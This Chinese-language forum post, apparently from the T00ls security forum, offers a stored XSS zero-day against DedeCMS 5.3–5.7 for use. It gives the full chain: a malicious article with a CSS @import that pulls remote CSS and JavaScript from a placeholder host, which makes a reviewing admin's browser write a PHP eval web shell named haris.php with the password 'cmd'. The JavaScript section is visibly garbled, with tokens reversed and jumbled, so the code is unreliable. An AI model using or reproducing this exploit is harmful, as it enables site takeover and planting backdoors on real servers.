dedecms xss oday通杀所有版本(T00ls首发) by haris
作者:haris
漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
下面说说利用方法。
条件有2个:
1.开启注册
2.开启投稿
注册会员----发表文章
内容填写:
<STYLE>@im\port
'\http://xxx.com/xss.css'
;</STYLE>
新建XSS.Css
body{
2 background-image:url(
'javascript:document.write("<SCRIPT src="http://xxx.com/xss.js"></SCRIPT>")'
)
}
新建xss.js 内容为
var request = false; |
02 | if(window.XMLHttpRequest) { |
03 | request = new XMLHttpRequest(); |
04 | if(request.overrideMimeType) { |
05 | request.overrideMimeType('text/xml'); |
06 | } |
07 | } else if(window.ActiveXObject) { |
08 | var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; |
09 | for(var i=0; i<VERSIONS.LENGTH; pre < } xmlhttp.send(params); ?Keep-Alive?); xmlhttp.setRequestHeader(?Connection?, params.length); xmlhttp.setRequestHeader(?Content-length?, x-www-form-urlencoded?); ?application xmlhttp.setRequestHeader(?Content-type?, true); url, xmlhttp.open(?POST?, ; params="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++" var sys_sql_query.php?; +u+? url add_admin(){ function add_admin(); u="getFolder(oUrl);" oUrl="top.location.href;" obj[obj.length-2] return obj="url.split('/')" ){ getFolder( xmlhttp="request;" {} catch(e) ActiveXObject(versions[i]); request="new" { try i++)> |
10 | <P>当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd</P> |